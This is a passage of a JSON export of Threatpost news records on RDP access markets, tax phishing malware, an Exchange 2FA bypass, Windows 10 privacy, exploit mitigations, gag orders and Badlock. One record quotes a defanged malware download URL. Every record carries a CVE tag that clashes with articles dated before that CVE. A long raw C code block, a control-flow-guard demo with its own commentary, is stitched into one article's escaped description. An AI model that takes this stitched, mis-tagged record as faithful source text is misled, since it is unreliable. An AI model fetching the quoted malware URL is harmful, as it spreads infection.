"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:47", "description": "Nearly two-thirds of servers and PCs peddled on the xDedic underground marketplace belong to schools and universities, and most are based in the United States.\n\nIn a [recent analysis of xDedic](<https://www.flashpoint-intel.com/blog/cybercrime/xdedic-rdp-targets/>), Flashpoint found that besides the education sector, PCs and servers tied to healthcare and legal firms make up the bulk of the available vulnerable systems.\n\nXDedic is the largest of many platforms cybercriminals use to buy access to compromised servers and PCs that use Microsoft\u2019s Remote Desktop Protocol (RDP). Using brute-force password attacks, the xDedic gang has grown the number of servers and PCs available for access to 85,000, up 10 percent from a year ago, according to Flashpoint.\n\nCriminals charge $50 to access the marketplace via Tor. Once in, criminals can browse thousands of compromised servers and PCs that can be accessed via a remote desktop session. Typically, access to a PC or server can range from $7 to $15, according to Flashpoint.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/06225118/xDedic-Black-Market.jpg>)Once a hacker accesses a remote system, they can steal data, move laterally within a corporate network or install malware.\n\n\u201cXDedic is the most prolific of these cybercriminal gangs. They have their own proprietary tools and techniques and have been prospering over the past year,\u201d said Vitali Kremez, senior intelligence analyst at Flashpoint.\n\nIn its research, Flashpoint said the United States, Germany, and Ukraine appear to be the most frequently targeted countries. The most exploited sectors are education, followed by healthcare, legal, aviation, and government. 
Least vulnerable to these types of attacks are the financial and telecom sectors.\n\n\u201cSchools appear to be the hardest hit because they have the least mature security departments and just can\u2019t effectively mitigate against these type of attacks,\u201d Kremez said. \u201cSchools also sometimes have large banks of RDP systems for students to access and play with.\u201d\n\nWhen it comes to being targeted by these types of attacks, Kremez said, the leading factors are a lack of computer hygiene, the number of external RDP servers available and systems that have notoriously bad passwords.\n\nOver the past year, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) has had its ups and downs. XDedic\u2019s original domain (xdedic[.]biz) disappeared shortly after [a Kaspersky Lab report](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/22070309/xDedic_marketplace_ENG.pdf>) (PDF) published in June described how xDedic provided a platform for the sale of compromised RDP servers. A month later in July, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) resurfaced, this time on a Tor domain, where it remains today.\n\n\u201cMicrosoft Windows is the most popular of the platforms targeted by these type attacks,\u201d Kremez said. \u201cSimply put, Windows is the most prolific system out there. When a criminal is looking to find the biggest easiest target with the highest probability of a successful infiltration, Windows is it,\u201d he said.\n\nAs for Microsoft, Kremez said, it is constantly updating its RDP software to thwart bad guys. \u201cThe weakest link isn\u2019t software. It\u2019s the human factor and a failure to secure servers and client PCs to begin with. 
Oftentimes people misconfigure their RDP server or give them passwords that are just not adequate.\u201d\n", "cvss3": {}, "published": "2017-04-25T13:45:07", "type": "threatpost", "title": "xDedic Market Spilling Over With School Servers, PCs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-03-22T11:03:12", "id": "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "href": "https://threatpost.com/xdedic-market-spilling-over-with-school-servers-pcs/125202/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday this year\u2019s crop of tax scams is using social engineering attacks based on fear to spread Zdowbot and Omaneat banking Trojans and collect personal info via spoofed tax sites linked to from phishing campaigns.\n\nThe warning comes with less than a month before the April 18 tax deadline and adds to an already busy tax season of scams reported by various security experts and the U.S. Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d, \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. Microsoft says scammers are also targeting certified public accountants with the email subject line \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warns recipients they face pending tax-related law enforcement action. 
A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in a Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Emails with the subject line \u201cI need a CPA\u201d contain the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1.png>)\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains malicious macro code. If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. \u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. These emails don\u2019t include attachments; rather, they contain warnings from a sender purporting to be the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. 
The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png>)\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. Even if the emails came from someone you know, be wary about opening the attachment or click on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Mike Mimoso talks to Cody Pierce, director of vulnerability research and prevention with Endgame, at RSA Conference 2017 about how attackers are changing their techniques in the face of mitigations and continuing to base exploits around legitimate APIs and functions to thwart detection.\n\n[](<https://itunes.apple.com/us/podcast/the-threatpost-podcast/id315355232?mt=2>)[](<https://threatpost.com/category/podcasts/feed/>)\n\nDownload: 
[Cody_Pierce_on_Exploit_Development.mp3](<http://traffic.libsyn.com/digitalunderground/Cody_Pierce_on_Exploit_Development.mp3>)\n\nMusic by Chris Gonsalves\n", "cvss3": {}, "published": "2017-03-13T10:27:18", "type": "threatpost", "title": "Cody Pierce on the Future of Exploit Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-16T18:24:34", "id": "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "href": "https://threatpost.com/cody-pierce-on-exploit-development/124249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:30", "description": "Enterprises running Exchange Server have been operating under a false sense of security with regard to two-factor authentication implementations on Outlook Web Access (OWA) adding an extra layer of protection.\n\nA design weakness has been exposed that can allow an attacker to easily bypass 2FA and access an organization\u2019s email inboxes, calendars, contacts and more.\n\nThe problem lies in the fact that Exchange Server also exposes the Exchange Web Services (EWS) interface alongside OWA and it is [not covered by two-factor authentication](<http://www.blackhillsinfosec.com/?p=5396>). EWS is enabled by default and shares the same port and server as OWA, meaning an attacker with [stolen] credentials can remotely access EWS, which talks to the same backend infrastructure as OWA, and would enable access to a user\u2019s inbox.\n\nThe issue was publicly disclosed on Wednesday by researcher Beau Bullock of Black Hills Information Security, a consultancy based in South Dakota. Bullock privately disclosed his findings to Microsoft on Sept. 28, and after an initial acknowledgement, repeated follow-up emails failed to produce a patch or mitigation. 
Bullock went public yesterday, but shortly thereafter, Microsoft contacted him with a mitigation that would likely break some services that rely on Exchange Web Services, such as thick clients like Outlook for Mac.\n\nBullock told Threatpost that it\u2019s likely Microsoft cannot fix this without re-architecting some parts of the affected infrastructure.\n\n\u201cThe biggest thing is that Outlook Web Access is on the same webserver as Exchange Web Services and they\u2019re both enabled by default. I think the biggest problem is that most people don\u2019t seem to understand that\u2019s the thing that\u2019s happening,\u201d Bullock said. \u201cA lot of people think they have this Exchange server on the Internet and they have it there just for OWA, but the biggest problem is they don\u2019t understand EWS is enabled by default as well. The fix is more widespread awareness that it\u2019s actually there.\u201d\n\nBullock, a penetration tester, believes that there isn\u2019t a lot of awareness that this configuration exists and that organizations aren\u2019t aware that this second protocol is running alongside OWA and is not covered by 2FA.\n\n\u201cThat\u2019s not inherently clear in the documentation that if you enable two-factor authentication on OWA, you have to be careful that you have this other protocol right here that is still only single factor,\u201d Bullock said. \u201cIt talks to same backend infrastructure.\u201d\n\nBullock pointed out that it\u2019s not unusual to have different protocols, such as RDP and SMB, running on the same server where, for example, RDP is covered by two-factor authentication and SMB is not. The two services, however, are not running on the same port, and Bullock points out that an enterprise could create firewall rules to curtail access.\n\n\u201cThat\u2019s why this is more of a serious issue,\u201d Bullock explained. \u201cWhen you expose a server externally, you allow access only to that port. 
If you don\u2019t know a completely separate protocol is operating on same port, you\u2019re potentially opening up another way to communicate to that infrastructure.\u201d\n\nBullock described in a report published yesterday how he carried out the attack against OWA protected by Duo for Outlook 2FA. \nBy targeting EWS with his test account\u2019s credentials and a pen-testing tool called MailSniper, which connects to Exchange and searches an inbox for sensitive data, Bullock was able to bypass the 2FA protecting OWA. An attacker in a real-world scenario could gain access to a user\u2019s credentials, for example, from any of the tens of millions of credentials dumped online this summer.\n\nTo confirm that this wasn\u2019t an issue with Duo for Outlook, Bullock ran a similar test against Office 365 with Microsoft Azure Multifactor Authentication enabled. Using the same attack, he was able to bypass that 2FA as well, Bullock said.\n\n\u201cThis does not affect Office 365 with multi-factor authentication (MFA) fully enabled. What the blog describes is not a software vulnerability and does not work without user account credentials/stolen passwords,\u201d a Microsoft spokesperson told Threatpost.\n\n\u201cI think in the end, the best solution would be to re-architect it,\u201d Bullock said. \u201cIn the short term, how hard would it be for Microsoft to disable it by default and if an organization actually needed to use EWS for a thick client, then they could enable it. 
They\u2019re trying to keep all the protocols open and make it easier for deployment.\u201d\n", "cvss3": {}, "published": "2016-11-03T15:15:56", "type": "threatpost", "title": "Outlook Web Access Two-Factor Authentication Bypass Exists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-03T19:15:56", "id": "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "href": "https://threatpost.com/outlook-web-access-two-factor-authentication-bypass-exists/121777/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:54", "description": "The Electronic Frontier Foundation is blasting Microsoft for its \u201cmalicious\u201d and \u201cannoying\u201d tactics when it comes to prodding Windows users to update their operating system to Windows 10.\n\nThe digital watchdog group says Microsoft\u2019s strategy of pushing the Windows 10 upgrade application onto users systems was unwelcome by many and the company crossed the line when users began uninstalling the app and Microsoft reacted by changing the app multiple times and bundling it into various security patches, creating a \u201ccat-and-mouse game to uninstall it,\u201d [wrote Amul Kalia, legal intake coordinator at the EFF](<https://www.eff.org/deeplinks/2016/08/windows-10-microsoft-blatantly-disregards-user-choice-and-privacy-deep-dive>).\n\n\u201cThe tactics Microsoft employed to get users of earlier versions of Windows to upgrade to Windows 10 went from annoying to downright malicious,\u201d he said. \u201cThe app couldn\u2019t be easily hidden or removed.\u201d\n\nKalia blames Microsoft\u2019s ambitious stated goal to install Windows 10 on one billion devices by the end of 2018 for its drive to \u201caggressively\u201d push the OS update on users. 
Officially Microsoft called the update campaign Get Windows 10 (GWX) and offered Windows 7 and 8.1 users the ability to upgrade to Windows 10 for free before July 29, 2016. According to Microsoft, 300 million devices were running Windows 10 in May, but it\u2019s unclear how many upgraded using the GWX app.\n\nWith GWX Microsoft sparked a vocal backlash from some Windows users who insisted they were forced to upgrade to Windows 10. The hostile response also included four lawsuits against Microsoft for its \u201cquestionable\u201d upgrade tactics. New York Attorney General Eric Schneiderman announced he would be pursuing a GWX investigation as well.\n\nWhen asked to comment on the EFF\u2019s critique of its GWX efforts Microsoft supplied Threatpost with the boilerplate statement: \u201cMicrosoft is committed to customer privacy and ensuring that customers have the information and tools they need to make informed decisions. We listened to feedback from our customers and evolved our approach to the upgrade process. Windows 10 continues to have the highest satisfaction of any version of Windows.\u201d\n\nOriginally, Microsoft pushed the Windows 10 upgrade app via its Windows Update system. Users who received the app had a Windows 10 upgrade icon placed in their system tray that doubled as a way to initiate the OS upgrade download as well as offering an advertisement that boasted new Windows 10 features.\n\nOver time Microsoft became more aggressive, according to the EFF, bundling Windows 10 ads as part of an Internet Explorer security patch. Also criticized was the fact that in many instances Microsoft didn\u2019t just download the Windows 10 upgrade app, but also downloaded the entire required Windows 10 installation files (4GB).\n\nBut the EFF maintains that in May 2016 Microsoft crossed a line when it changed the expected behavior of a dialog prompt used in a window tied to the Windows 10 upgrade app. 
\u201cSpecifically, when prompted with a Windows 10 update, if the user chose to decline it by hitting the \u2018X\u2019 in the upper right hand corner, Microsoft interpreted that as consent to download Windows 10,\u201d Kalia wrote.\n\nThe EFF also asserts that with the introduction of the Cortana digital assistant, a feature introduced with Windows 10, Microsoft demonstrated another disturbing behavior pattern and disregarded user privacy under the guise of Cortana customization.\n\n\u201cWindows 10 sends an unprecedented amount of usage data back to Microsoft,\u201d Kalia maintains, including location data, text input, voice input, touch input, webpages you visit, and telemetry data regarding your general usage of your computer, including which programs you run and for how long.\n\nOf course, users can disable data-sharing features to limit the amount of personal information Microsoft collects. However, the EFF says even those who opt out of sharing data within Windows 10 still can\u2019t escape sharing some data with Microsoft via the operating system\u2019s telemetry reporting.\n\nWindows 10 telemetry, also known as the Universal Telemetry Client (UTC), is \u201csystem data that is uploaded by the Connected User Experience and Telemetry component.\u201d Information shared with Microsoft via UTC includes system uptime and crash data and hardware attributes such as CPU, installed memory, and storage, according to [Windows expert Ed Bott](<http://www.zdnet.com/article/windows-10-telemetry-secrets/>), who has written extensively about Windows 10 telemetry.\n\nUTC can collect personal data as part of a crash report when specific files are the cause of the system failure. Users of Windows 10 Enterprise Edition can turn telemetry data sharing off, but Home and Pro users can\u2019t, the EFF maintains.\n\n\u201cThere\u2019s no doubt that Windows 10 has some great security improvements over previous versions of the operating system. 
But it\u2019s a shame that Microsoft made users choose between having privacy and security,\u201d Kalia said.\n", "cvss3": {}, "published": "2016-08-18T16:38:30", "type": "threatpost", "title": "EFF Blasts Microsoft Over Windows 10 Rollout", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-08-19T17:00:44", "id": "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "href": "https://threatpost.com/eff-blasts-microsoft-over-malicious-windows-10-rollout-tactics/120006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:58", "description": "LAS VEGAS \u2014 It wasn\u2019t long ago that ROP, or return-oriented programming, was a hacker\u2019s best friend when it came to bypassing mitigations against memory-based attacks such as DEP and ASLR.\n\nROP, however, is so 2005. In the last couple of years, researchers and attackers have figured out how to bypass popular tools such as Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET), without the need for ROP. Exploit kits, for example, have integrated attacks that have moved up the exploitation stack closer to memory and before code is written to disk. All the while, defenders still focus on post-exploitation techniques (i.e., ROP) that are obsolete today.\n\nThis week at Black Hat USA 2016 in Las Vegas, researchers at Endgame are expected to introduce new defensive techniques that could level the playing field. Their approach is called Hardware Assisted Control Flow Integrity (HA-CFI), which leverages features in the micro-architecture of Intel processors, such as the performance monitoring unit (PMU), for security.\n\n\u201cDuring the last two years, academics have been using it for security purposes,\u201d said Cody Pierce, Endgame director of vulnerability research. \u201cWe\u2019re continuing the idea of using hardware features to implement a security check. 
That\u2019s where CFI comes in and monitors the PMU to get real-time views into protected processes.\u201d\n\nWhere tools such as EMET catch attacks in the post-exploitation stage, HA-CFI operates in the exploitation stage, before bypasses happen.\n\n\u201cIt\u2019s generic in the fact it has no knowledge of exploit techniques, and doesn\u2019t know about ROP; the system is autonomous,\u201d Pierce said. \u201cWhat it\u2019s looking for is an abnormal change in execution. Usually this is the absolute first step of exploits. They will redirect execution from normal- to attacker-controlled execution. That\u2019s a very specific thing that we\u2019re hoping to pick up on.\n\n\u201cAn analogy to malware would be that you would want to pick up detection of malware before it\u2019s written to disk,\u201d Pierce said. \u201cYou don\u2019t want to wait until it runs and sets up persistence and backdoors.\u201d\n\nMicrosoft implemented [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) starting with Visual Studio 2015 and it runs only on x86 and x64 releases on Windows 8.1 and Windows 10. CFG restricts where applications can execute code from, Microsoft said, cutting into the effectiveness of code execution attacks and buffer overflow exploits. Pierce said CFG has its limitations, specifically that it can run only on the latest compilers and OSes, requiring organizations to recompile in order to run it. HA-CFI would operate at runtime, and its biggest limitation, Pierce said, is a performance overhead that could be 3x higher than Microsoft\u2019s, requiring organizations to consider that tradeoff when protecting commonly exploited apps such as browsers, Office and Flash.\n\nAs for ROP being on life support, a number of prominent researchers have been developing new approaches to mitigation bypasses that are putting those attacks out to pasture. 
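The check that CFG inserts before an indirect call, reduced to its essentials as an added example (illustrative code written for this page, not Microsoft's CFG implementation and not Endgame's HA-CFI): a flat table of registered entry points stands in for CFG's process-wide bitmap; `handle_add`, `handle_neg`, `spawn_shell` and the `dispatcher` struct are hypothetical application code; and the `memcpy` over the function pointer stands in for the memory-corruption bug an exploit would use to redirect execution. The last case shows the coarse-grained nature of the check: any registered function passes, which is the room bypasses of this kind of mitigation work in.

```c
/* Added example, not Microsoft's CFG code: a software stand-in for the
 * valid-target check that CFG performs before every indirect call. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef int (*handler_fn)(int);

/* Legitimate, address-taken targets (hypothetical application code). */
static int handle_add(int x) { return x + 1; }
static int handle_neg(int x) { return -x; }

/* Reachable only if an attacker overwrites a function pointer: no call
 * site in this program legitimately takes its address. */
static int spawn_shell(int x) { (void)x; return 0xBAD; }   /* 2989 */

/* CFG proper uses a process-wide bitmap built from compiler metadata; a
 * flat table of entry addresses is enough to show the check itself. */
#define MAX_TARGETS 16
static uintptr_t valid_targets[MAX_TARGETS];
static size_t n_valid;

static void cfg_register(handler_fn fn) {
    if (n_valid < MAX_TARGETS)
        valid_targets[n_valid++] = (uintptr_t)fn;
}

/* The guard check inserted before an indirect call:
 * 1 if target is a registered entry point, 0 otherwise. */
static int cfg_check(uintptr_t target) {
    for (size_t i = 0; i < n_valid; i++)
        if (valid_targets[i] == target) return 1;
    return 0;
}

/* An object whose function pointer a heap overflow or UAF could overwrite. */
struct dispatcher { handler_fn fn; int arg; };

/* Guarded dispatch: 0 and the call's result in *out, or -1 when the guard
 * rejects the target (real CFG terminates the process at that point). */
static int guarded_dispatch(const struct dispatcher *d, int *out) {
    if (!cfg_check((uintptr_t)d->fn)) return -1;
    *out = d->fn(d->arg);
    return 0;
}

static void cfg_init(void) {
    n_valid = 0;
    cfg_register(handle_add);
    cfg_register(handle_neg);
    /* spawn_shell is deliberately never registered. */
}

/* Normal control flow: handle_add(41) -> 42. */
static int demo_benign(void) {
    cfg_init();
    struct dispatcher d = { handle_add, 41 };
    int out = 0;
    return guarded_dispatch(&d, &out) == 0 ? out : -1;
}

/* Hijack: corruption overwrites d.fn with spawn_shell. The guard sees an
 * address that is not a valid entry point and refuses the call (-1). */
static int demo_hijacked(void) {
    cfg_init();
    struct dispatcher d = { handle_add, 41 };
    handler_fn evil = spawn_shell;
    memcpy(&d.fn, &evil, sizeof d.fn);      /* stand-in for the memory bug */
    int out = 0;
    return guarded_dispatch(&d, &out) == 0 ? out : -1;
}

/* Limitation: the check is coarse-grained. Redirecting d.fn to any other
 * registered function still passes, so handle_neg(41) -> -41 goes through
 * even though no legitimate path in this program calls it here. */
static int demo_coarse(void) {
    cfg_init();
    struct dispatcher d = { handle_add, 41 };
    handler_fn other = handle_neg;
    memcpy(&d.fn, &other, sizeof d.fn);
    int out = 0;
    return guarded_dispatch(&d, &out) == 0 ? out : -1;
}

int main(void) {
    printf("benign: %d, hijacked: %d, coarse: %d\n",
           demo_benign(), demo_hijacked(), demo_coarse());
    return 0;
}
```

The table lookup is the whole mitigation: it costs a few instructions per indirect call, which is why it is compiled in rather than bolted on at runtime, and it says nothing about whether the chosen target is the one the program meant, which is where a PMU-driven approach like HA-CFI tries to add signal.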
[Yang Yu](<https://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328/>), a two-time [Microsoft bounty winner](<https://threatpost.com/patched-badtunnel-windows-bug-has-extensive-impact/118697/>), really got the ball rolling with a 2014 Black Hat talk called [Write Once, Pwn Anywhere](<https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf>) where he was able to change a value in memory that allowed his attack to bypass native restrictions and execute commands sans ROP. The Hacking Team dump of last summer also showed that other professionals had [moved beyond ROP](<https://threatpost.com/curious-tale-of-a-microsoft-silverlight-zero-day/115873/>) with a slate of attacks that [bypass EMET](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) and other mitigations.\n\n\u201cFrom an exploit writer\u2019s perspective, you don\u2019t want to have to do more work than necessary, and we\u2019ve learned ROP is a little unnecessary,\u201d Pierce said, adding that some of these techniques that have become public in the last 12-18 months have made it easier to develop more powerful exploits.\n\n\u201cWith ROP, usually some work has to be done to get all versions of apps you want to exploit,\u201d Pierce said. \u201cThese advanced approaches eliminate that need.\u201d\n", "cvss3": {}, "published": "2016-08-01T13:00:22", "type": "threatpost", "title": "HA-CFI Technique Checks Mitigation Bypasses Earlier", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-07-29T19:00:17", "id": "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "href": "https://threatpost.com/new-technique-checks-mitigation-bypasses-earlier/119568/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "description": "Microsoft\u2019s lawsuit against the U.S. 
government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support from privacy advocates. For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. \n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. \u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer, Brad Smith, said Microsoft has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. Of those, 1,752 (68 percent) had no end date. Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges a gag-order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reforms of ECPA have long been sought by privacy advocates such as the Electronic Privacy Information Center. \n\nAlan Butler, senior counsel at the Electronic Privacy Information Center, said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. 
\u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. \n\nThe ACLU, for its part, used Microsoft\u2019s lawsuit to press Congress to reform the Electronic Communications Privacy Act. \u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU, in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), the Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that would also have addressed the notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. 
\u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. \n\nBecause such requests are secret, it\u2019s impossible to tell how many of them businesses receive. A 2012 paper from Texas Southern University\u2019s Thurgood Marshall School of Law, \u201c[Gagged, Sealed & Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), estimates that magistrate judges approve 30,000 electronic surveillance orders each year. \n\n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. 
\n", "cvss3": {}, "published": "2016-04-15T15:22:02", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-15T19:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:35", "description": "Despite the [Badlock hype machine](<https://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117349/>) cranked up high, we don\u2019t know much about this impending soul-crushing vulnerability other than it could be bad, it could be in the Windows Server Message Block and it already has its own requisite logo and website.\n\nNonetheless, we have a little more than two weeks before the next Microsoft Patch Tuesday on April 12 to speculate, guess and fear what might come first: the patch or a public exploit.\n\nStefan Metzmacher, a member of the Samba team and an employee with German consultancy SerNet, is credited with finding the bug and said both Samba and Windows will be patched. He said deductive reasoning leads us to consider that the bug might be in Server Message Block (SMB). Samba is an open source SMB implementation.\n\nBug hunters, good and bad, are surely on the case and some have already found what could be a juicy clue in one of Metzmacher\u2019s [commits to git.samba.org](<https://git.samba.org/?p=samba.git;a=blob;f=source4/libcli/smb2/lock.c;h=f2a76d876a103ce0dd06a5b362c2e629974772d5;hb=HEAD>). Metzmacher is the author of the lock.c file in Samba\u2014it handles SMB2 client lock handling\u2014and within a particular commit he includes a comment: \u201d /* this is quite bizarre \u2013 the spec says we must lie about the length! 
*/\u201d\n\nThere\u2019s no confirmation this is the bug, but one researcher told Threatpost that the comment indicates that there are places in the protocol where the size of a string would be misrepresented. This could lead to serious errors because a developer could use the declared size to allocate space in a buffer, which is fine if the number is accurate. But if the length is a \u201clie\u201d as Metzmacher says, and the code ends up copying more bytes than it allocated room for, you have a buffer overrun and, potentially, code execution.\n\nWhether there is enough information here for an exploit writer to craft something nasty in the next two weeks remains to be seen. One thing is for certain, however: defenders will sway in the wind for the next 15 days.\n\n\u201cA skilled exploit writer may have enough information to write an exploit based on this information. On the other hand, as a defender, I am missing some details,\u201d said Johannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center. \u201cFor example, it would be nice to know if this affects servers only, or clients as well. Which network ports and which SMB version are affected? 
